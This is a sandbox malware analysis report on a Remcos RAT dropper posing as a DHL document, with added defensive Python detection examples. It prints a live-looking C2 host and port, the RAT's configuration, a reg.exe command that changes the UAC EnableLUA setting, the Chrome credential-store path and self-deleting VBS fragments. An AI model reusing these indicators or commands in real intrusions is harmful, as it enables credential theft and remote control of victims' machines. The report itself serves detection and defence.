
Windows Analysis Report ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe

Overview

General Information

Sample Name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
Analysis ID:491719
MD5:3808d4a11cbee20896cca28f9a3bcb9b
SHA1:b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
SHA256:53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
Tags: DHL, exe, geo, PRT, RAT, RemcosRAT

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Allocates memory in foreign processes
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Creates processes with suspicious names
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 1368 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
    • cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6852 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5048 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1680 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Iqzenco.exe (PID: 7112 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 4108 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • Iqzenco.exe (PID: 484 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • secinit.exe (PID: 6644 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
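The tree above has three shapes worth alerting on, none of which the sandbox's Sigma set caught ("No Sigma rule has matched" below): an executable from a user-writable path (the DHL lure, later Iqzenco.exe from C:\Users\Public\Libraries) starting a clean Windows binary (mobsync.exe, secinit.exe) that then carries the Remcos payload; cmd.exe running batch files staged in C:\Users\Public; and reg.exe deleting HKCU\Environment\windir. The following Python is an added example, not part of this report or of Joe Sandbox: it transcribes the tree into Sysmon-style process-creation records (field names are assumed, conhost.exe children omitted) and runs those three checks over them. Reading the windir deletion as clean-up after a per-user %windir% override is an interpretation of the command line, not something the report states.

```python
"""Parent/child and command-line checks over the process tree in this report.
Added example, not from the report or Joe Sandbox; the records below are
transcribed from the tree into a Sysmon-like shape (field names assumed)."""
import re
from typing import Dict, List, Optional, Tuple

Event = Dict[str, object]
CMD = r"C:\Windows\system32\cmd.exe"

# Transcribed from the process tree above (conhost.exe children left out).
PROCESS_EVENTS: List[Event] = [
    {"pid": 6548, "ppid": None, "image": r"C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe"'},
    {"pid": 1368, "ppid": 6548, "image": r"C:\Windows\System32\mobsync.exe", "cmdline": r"C:\Windows\System32\mobsync.exe"},
    {"pid": 7156, "ppid": 6548, "image": CMD, "cmdline": CMD + r' /c "C:\Users\Public\Trast.bat" '},
    {"pid": 6852, "ppid": 7156, "image": CMD, "cmdline": CMD + r" /K C:\Users\Public\UKO.bat"},
    {"pid": 5048, "ppid": 6548, "image": CMD, "cmdline": CMD + r' /c "C:\Users\Public\nest.bat" '},
    {"pid": 1680, "ppid": 5048, "image": r"C:\Windows\system32\reg.exe", "cmdline": r"reg delete hkcu\Environment /v windir /f"},
    {"pid": 7112, "ppid": None, "image": r"C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe",
     "cmdline": r'"C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe"'},
    {"pid": 4108, "ppid": 7112, "image": r"C:\Windows\System32\mobsync.exe", "cmdline": r"C:\Windows\System32\mobsync.exe"},
    {"pid": 484, "ppid": None, "image": r"C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe",
     "cmdline": r'"C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe"'},
    {"pid": 6644, "ppid": 484, "image": r"C:\Windows\System32\secinit.exe", "cmdline": r"C:\Windows\System32\secinit.exe"},
]

WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")
SHELLS = ("\\cmd.exe", "\\conhost.exe")
BATCH_IN_PUBLIC = re.compile(r"c:\\users\\public\\[^\s\"']+\.(?:bat|cmd)", re.I)


def system_binary_from_user_path(ev: Event, parent: Optional[Event]) -> Optional[str]:
    """A Windows binary launched by an executable living in a user-writable
    directory: the usual shape of hollowing/thread injection into a benign host."""
    img = str(ev["image"]).lower()
    if parent is None or not img.startswith(WINDOWS_DIRS) or img.endswith(SHELLS):
        return None
    if str(parent["image"]).lower().startswith(USER_WRITABLE):
        name = img.rsplit("\\", 1)[-1]
        return f"{name} spawned by {parent['image']}"
    return None


def batch_from_public(ev: Event, parent: Optional[Event]) -> Optional[str]:
    """cmd.exe executing a batch file staged in the world-writable C:\\Users\\Public."""
    if not str(ev["image"]).lower().endswith("\\cmd.exe"):
        return None
    m = BATCH_IN_PUBLIC.search(str(ev["cmdline"]))
    return f"cmd.exe runs {m.group(0)}" if m else None


def hkcu_environment_windir(ev: Event, parent: Optional[Event]) -> Optional[str]:
    """reg.exe adding or deleting HKCU\\Environment\\windir.  A per-user windir
    value overrides %windir% expansion for that user's processes; the delete
    seen in this tree is consistent with cleaning such an override up
    (interpretation, not stated by the report)."""
    c = str(ev["cmdline"]).lower()
    if str(ev["image"]).lower().endswith("\\reg.exe") and "hkcu\\environment" in c and re.search(r"/v\s+windir\b", c):
        return "reg.exe modifies HKCU\\Environment\\windir: " + str(ev["cmdline"])
    return None


RULES = [("system_binary_from_user_path", system_binary_from_user_path),
         ("batch_from_public", batch_from_public),
         ("hkcu_environment_windir", hkcu_environment_windir)]


def evaluate(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Run every rule over every event; returns (pid, rule name, message)."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings = []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        for rule_name, rule in RULES:
            msg = rule(ev, parent)
            if msg:
                findings.append((int(ev["pid"]), rule_name, msg))
    return findings


if __name__ == "__main__":
    for pid, rule_name, msg in evaluate(PROCESS_EVENTS):
        print(f"PID {pid} [{rule_name}] {msg}")
```

Run against the transcribed tree this yields seven findings: the two mobsync.exe and one secinit.exe instances, the three batch launches from C:\Users\Public, and the reg.exe call. Note that the code-function lines later in the report name C:\Windows\SysWOW64\mobsync.exe, i.e. the 32-bit copy; a real rule should cover both System32 and SysWOW64, as WINDOWS_DIRS does.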

Malware Configuration

Threatname: Remcos

{"Version": "3.1.5 Pro", "Host:Port:Password": "ongod4ever.ddns.net:5652:0", "Assigned name": "ABLE GOD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VTGWT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
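What the configuration above means operationally, as an added example that is not part of the report and not vendor tooling: the "Host:Port:Password" entry, mutex and file names become indicators, while the install and Run-key flags decide which of those artifacts will actually appear on disk and in the registry. Here "Install flag" is Disable, so the Run value "Remcos" and the copied remcos.exe are configured but should not be expected (this sample persists via the dropper instead, see the .url file below). The configuration literal is the extractor output above, trimmed to the fields used; the telemetry records and their field names are constructed.

```python
"""Turn the Remcos configuration extracted above into concrete indicators and
check telemetry against them.  Added example, not from the report or any
vendor tool: REMCOS_CONFIG is the extractor output shown on this page, the
event records and their field names are constructed."""
from typing import Dict, List, Tuple

# Extractor output from this report, trimmed to the fields used below.
REMCOS_CONFIG: Dict[str, str] = {
    "Version": "3.1.5 Pro",
    "Host:Port:Password": "ongod4ever.ddns.net:5652:0",
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Install path": "AppData",
    "Copy file": "remcos.exe",
    "Copy folder": "Remcos",
    "Startup value": "Remcos",
    "Mutex": "Remcos-8VTGWT",
    "Keylog path": "AppData",
    "Keylog folder": "remcos",
    "Keylog file": "logs.dat",
}

# Free dynamic-DNS zones often used for RAT C2 (assumed starting list).
DYNAMIC_DNS_SUFFIXES = (".ddns.net", ".duckdns.org", ".no-ip.org", ".hopto.org")


def parse_c2(spec: str) -> List[Dict[str, object]]:
    """Split a Remcos 'host:port:password' entry; ';' separates several C2s."""
    c2s = []
    for entry in filter(None, spec.split(";")):
        host, port, password = entry.split(":", 2)   # the password may contain ':'
        c2s.append({"host": host.lower(), "port": int(port), "password": password})
    return c2s


def derive_iocs(cfg: Dict[str, str]) -> Dict[str, object]:
    """Map configuration fields to the artifacts they produce at runtime."""
    c2 = parse_c2(cfg["Host:Port:Password"])
    # The Run value and the copied binary only exist if the install routine
    # runs; this sample has it disabled, so those become None (no false hits).
    install = cfg.get("Install flag") == "Enable"
    run_value = cfg["Startup value"] if install and cfg.get("Setup HKCU\\Run") == "Enable" else None
    copy_suffix = (cfg["Copy folder"] + "\\" + cfg["Copy file"]).lower() if install else None
    return {
        "c2": c2,
        "dynamic_dns": [e["host"] for e in c2 if str(e["host"]).endswith(DYNAMIC_DNS_SUFFIXES)],
        "mutex": cfg["Mutex"],
        "run_value": run_value,
        "copy_path_suffix": copy_suffix,
        # Keylog output lands in <Keylog path>\<Keylog folder>\<Keylog file>.
        "keylog_path_suffix": (cfg["Keylog folder"] + "\\" + cfg["Keylog file"]).lower(),
    }


def match_events(iocs: Dict[str, object], events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for each record that hits an indicator."""
    hosts = {e["host"] for e in iocs["c2"]}
    ports = {e["port"] for e in iocs["c2"]}
    hits = []
    for i, ev in enumerate(events):
        kind = ev["type"]
        if kind == "dns":
            name = str(ev["query"]).lower()
            if name in hosts:
                hits.append((i, "DNS query for configured C2 host"))
            elif name.endswith(DYNAMIC_DNS_SUFFIXES):
                hits.append((i, "query for dynamic-DNS host (weak indicator)"))
        elif kind == "net" and ev["dport"] in ports:
            hits.append((i, "TCP connection to configured C2 port"))
        elif kind == "mutex" and ev["name"] == iocs["mutex"]:
            hits.append((i, "Remcos mutex created"))
        elif kind == "reg" and iocs["run_value"] and str(ev["path"]).lower().endswith("\\run\\" + str(iocs["run_value"]).lower()):
            hits.append((i, "Run key value from config written"))
        elif kind == "file" and str(ev["path"]).lower().endswith(str(iocs["keylog_path_suffix"])):
            hits.append((i, "keylog file written"))
    return hits


# Constructed telemetry, modelled on the DNS/TCP lines in the Networking section.
SAMPLE_EVENTS = [
    {"type": "dns", "query": "onedrive.live.com"},
    {"type": "dns", "query": "ongod4ever.ddns.net"},
    {"type": "net", "src": "192.168.2.4", "dst": "185.140.53.15", "dport": 5652},
    {"type": "mutex", "name": "Remcos-8VTGWT"},
    {"type": "reg", "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Remcos"},
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\remcos\logs.dat"},
]

if __name__ == "__main__":
    iocs = derive_iocs(REMCOS_CONFIG)
    for idx, why in match_events(iocs, SAMPLE_EVENTS):
        print(f"event {idx}: {why}: {SAMPLE_EVENTS[idx]}")
```

On the constructed records this flags the DNS query, the TCP connection to port 5652, the mutex and the keylog file, and deliberately does not flag the Run key write, because the configuration says the install routine is off; flip "Install flag" to Enable and the Run value becomes a live indicator.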

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\ocnezqI.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers; Description: Detects possible shortcut usage for .URL persistence; Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
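The rule above only tells you the dropped file is an InternetShortcut with a URL= line; the report does not show what that URL points at. The persistence trick the rule is written for is a .url whose target is a local program rather than a web page, which Windows launches via ShellExecute when the shortcut is opened (from a Startup folder, at every logon). The Python below is an added example, not from the report or the rule author: a parser for the .url format plus a check that classifies the target. The file contents are constructed; pointing ocnezqI.url at Iqzenco.exe is an assumption, consistent with Iqzenco.exe appearing as a top-level process in the tree but not stated by the report.

```python
"""Scan .url (InternetShortcut) files for targets that launch a local program
instead of opening a web page.  Added example, not from the report or the
rule author; the report only shows that ocnezqI.url starts with
[InternetShortcut] and has a URL= line, so all file contents below are
constructed (the Iqzenco.exe target is an assumption)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urlparse

EXEC_EXT = (".exe", ".scr", ".dll", ".bat", ".cmd", ".vbs", ".js", ".hta", ".ps1")


def parse_internet_shortcut(text: str) -> Optional[Dict[str, str]]:
    """Parse the INI-style .url format.  Returns the keys under
    [InternetShortcut] (names lower-cased) or None if the section is missing."""
    section, seen, fields = None, False, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            seen = seen or section == "internetshortcut"
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields if seen else None


def classify_target(url: str) -> Optional[str]:
    """Return a reason if the URL resolves to a local or UNC file (which the
    shell will execute); web URLs return None."""
    u = url.strip()
    parsed = urlparse(u)
    if parsed.scheme.lower() == "file":
        target = unquote(parsed.path)
        if parsed.netloc:                       # file://server/share/x -> UNC path
            target = "\\\\" + parsed.netloc + target
        target = target.lstrip("/").replace("/", "\\")
    elif re.match(r"^[a-z]:\\", u, re.I) or u.startswith("\\\\"):
        target = u                              # bare drive or UNC path
    else:
        return None
    reason = "local target " + target
    if target.lower().endswith(EXEC_EXT):
        reason += " (executable)"
    return reason


def scan_url_files(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """files maps path -> content; returns (path, reason) for suspicious ones."""
    findings = []
    for path, content in files.items():
        fields = parse_internet_shortcut(content)
        if not fields or "url" not in fields:
            continue
        reason = classify_target(fields["url"])
        if reason:
            findings.append((path, reason))
    return findings


# Constructed contents; only the first path comes from the report.
SAMPLE_URL_FILES = {
    r"C:\Users\Public\Libraries\ocnezqI.url":
        "[InternetShortcut]\r\nURL=file:///C:/Users/Public/Libraries/Iqzenco/Iqzenco.exe\r\nIconIndex=0\r\n",
    r"C:\Users\user\Favorites\Vendor.url":
        "[InternetShortcut]\r\nURL=https://www.example.com/\r\n",
    r"C:\Users\user\Desktop\Tools.url":
        "[InternetShortcut]\r\nURL=\\\\fileserver\\tools\\update.cmd\r\n",
    r"C:\Users\user\Desktop\notes.txt": "not a shortcut\r\n",
}

if __name__ == "__main__":
    for path, reason in scan_url_files(SAMPLE_URL_FILES):
        print(f"{path}: {reason}")
```

For triage, run the scan over every .url under the user and all-users Startup folders as well as the location seen here (C:\Users\Public\Libraries), and treat any local executable target as an autorun entry.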

Memory Dumps

Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
Strings:
  • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5f86c:$str_b2: Executing file:
  • 0x60800:$str_b3: GetDirectListeningPort
  • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x603d4:$str_b5: licence_code.txt
  • 0x60278:$str_b7: \update.vbs
  • 0x5f8dc:$str_b9: Downloaded file:
  • 0x5f8a8:$str_b10: Downloading file:
  • 0x5f890:$str_b12: Failed to upload file:
  • 0x607c8:$str_b13: StartForward
  • 0x607e8:$str_b14: StopForward
  • 0x60220:$str_b15: fso.DeleteFile "
  • 0x601b4:$str_b16: On Error Resume Next
  • 0x60250:$str_b17: fso.DeleteFolder "
  • 0x5f880:$str_b18: Uploaded file:
  • 0x5f91c:$str_b19: Unable to delete:
  • 0x601e8:$str_b20: while fso.FileExists("
Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
Strings:
  • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5f86c:$str_b2: Executing file:
  • 0x60800:$str_b3: GetDirectListeningPort
  • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x603d4:$str_b5: licence_code.txt
  • 0x60278:$str_b7: \update.vbs
  • 0x5f8dc:$str_b9: Downloaded file:
  • 0x5f8a8:$str_b10: Downloading file:
  • 0x5f890:$str_b12: Failed to upload file:
  • 0x607c8:$str_b13: StartForward
  • 0x607e8:$str_b14: StopForward
  • 0x60220:$str_b15: fso.DeleteFile "
  • 0x601b4:$str_b16: On Error Resume Next
  • 0x60250:$str_b17: fso.DeleteFolder "
  • 0x5f880:$str_b18: Uploaded file:
  • 0x5f91c:$str_b19: Unable to delete:
  • 0x601e8:$str_b20: while fso.FileExists("
Source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp
Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
(10 further memory-dump matches are collapsed in the original report)

Unpacked PEs

Source: 22.2.mobsync.exe.50601a02.1.unpack
Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
Strings:
  • 0x5d2bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x5d238:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5d238:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5c838:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x5ce90:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5c46c:$str_b2: Executing file:
  • 0x5d400:$str_b3: GetDirectListeningPort
  • 0x5cc50:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x5cfd4:$str_b5: licence_code.txt
  • 0x5ce78:$str_b7: \update.vbs
  • 0x5c4dc:$str_b9: Downloaded file:
  • 0x5c4a8:$str_b10: Downloading file:
  • 0x5c490:$str_b12: Failed to upload file:
  • 0x5d3c8:$str_b13: StartForward
  • 0x5d3e8:$str_b14: StopForward
  • 0x5ce20:$str_b15: fso.DeleteFile "
  • 0x5cdb4:$str_b16: On Error Resume Next
  • 0x5ce50:$str_b17: fso.DeleteFolder "
  • 0x5c480:$str_b18: Uploaded file:
  • 0x5c51c:$str_b19: Unable to delete:
  • 0x5cde8:$str_b20: while fso.FileExists("
Source: 5.2.mobsync.exe.400000.0.raw.unpack
Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
Strings:
  • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5f86c:$str_b2: Executing file:
  • 0x60800:$str_b3: GetDirectListeningPort
  • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x603d4:$str_b5: licence_code.txt
  • 0x60278:$str_b7: \update.vbs
  • 0x5f8dc:$str_b9: Downloaded file:
  • 0x5f8a8:$str_b10: Downloading file:
  • 0x5f890:$str_b12: Failed to upload file:
  • 0x607c8:$str_b13: StartForward
  • 0x607e8:$str_b14: StopForward
  • 0x60220:$str_b15: fso.DeleteFile "
  • 0x601b4:$str_b16: On Error Resume Next
  • 0x60250:$str_b17: fso.DeleteFolder "
  • 0x5f880:$str_b18: Uploaded file:
  • 0x5f91c:$str_b19: Unable to delete:
  • 0x601e8:$str_b20: while fso.FileExists("
Source: 26.2.secinit.exe.400000.0.unpack
Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
(19 further unpacked-PE matches are collapsed in the original report)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 22.2.mobsync.exe.400000.0.unpack; Malware Configuration Extractor: Remcos (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; VirusTotal: Detection: 26%
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; ReversingLabs: Detection: 24%
Yara detected Remcos RAT
Source: Yara match; file sources of type UNPACKEDPE:
  • 22.2.mobsync.exe.50601a02.1.unpack
  • 5.2.mobsync.exe.400000.0.raw.unpack
  • 26.2.secinit.exe.400000.0.unpack
  • 5.2.mobsync.exe.50601a02.1.unpack
  • 26.2.secinit.exe.50601a02.1.raw.unpack
  • 5.2.mobsync.exe.400000.0.unpack
  • 26.2.secinit.exe.50601a02.1.unpack
  • 5.2.mobsync.exe.50601a02.1.raw.unpack
  • 22.2.mobsync.exe.400000.0.unpack
  • 26.2.secinit.exe.400000.0.raw.unpack
  • 22.2.mobsync.exe.50601a02.1.raw.unpack
  • 22.2.mobsync.exe.400000.0.raw.unpack
Source: Yara match; file sources of type MEMORY:
  • 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp
  • 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp
  • 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp
  • 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp
  • 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp
  • 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp
  • 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp
  • 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp
  • 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp
Source: Yara match; process memory spaces (type MEMORYSTR):
  • mobsync.exe PID: 1368
  • mobsync.exe PID: 4108
  • secinit.exe PID: 6644
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe; ReversingLabs: Detection: 24%
Source: mobsync.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,5_2_004170AC
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 5_2_00406176 FindFirstFileW,FindNextFileW,5_2_00406176
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,22_2_004170AC
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_00406176 FindFirstFileW,FindNextFileW,22_2_00406176
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0040A3AF
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0040A5CA
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004456A9 FindFirstFileExA,22_2_004456A9
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_004077EE
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,22_2_00406930

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: ongod4ever.ddns.net
Uses dynamic DNS services
Source: unknown; DNS query: name: ongod4ever.ddns.net
Source: global traffic; TCP traffic: 192.168.2.4:49771 -> 185.140.53.15:5652
